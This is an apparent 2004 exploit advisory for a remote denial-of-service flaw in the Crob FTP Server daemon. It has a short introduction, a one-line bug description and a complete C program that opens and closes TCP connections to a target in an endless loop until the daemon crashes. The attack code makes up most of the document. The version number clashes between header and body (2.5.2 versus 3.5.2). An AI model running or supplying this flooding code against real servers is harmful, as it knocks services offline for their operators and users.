Application: Crob FTP daemon http://www.crob.net/en/ Versions: 2.5.2 maybe others Platforms: Windows NT Bug: Denial of Service Exploitation: remote Date: 12 Feb 2004 Author: gsicht e-mail: nothing.king@firemail.de ####################################################################### 1) Introduction 2) Bug 3) The Code ####################################################################### =============== 1) Introduction =============== Quoute from the crob ftp's website: "Crob Software Studio is a professional and innovative Internet software developing team. With incessant endeavor. Now we have Crob FTP Server. A professional FTP Service solution." ####################################################################### ====== 2) Bug ====== Crob FTP Server 3.5.2 is vulnerable to a Denial of Service attack. The connecting and disconnecting to the server leads to the crash of the daemon. ####################################################################### =========== 3) The Code =========== /******************************/ #include #include #include #include int main(int argc, char *argv[]) { int s; struct sockaddr_in target; if(argc < 2) { printf("Usage: %s HOST [PORT]\n\n",argv[0]); return 0; } do { s = socket(AF_INET, SOCK_STREAM, 0); target.sin_family = AF_INET; target.sin_port = htons(atoi(argv[2])); target.sin_addr.s_addr = inet_addr(argv[1]); printf("- connecting...\n"); if( connect(s,(struct sockaddr*)&target, sizeof(struct sockaddr))<0) { printf(" connect() error!\n\n"); exit(-1); } printf(" connected\n"); printf(" closing connection\n"); close(s); } while(1); return 0; } /*******************************/ #######################################################################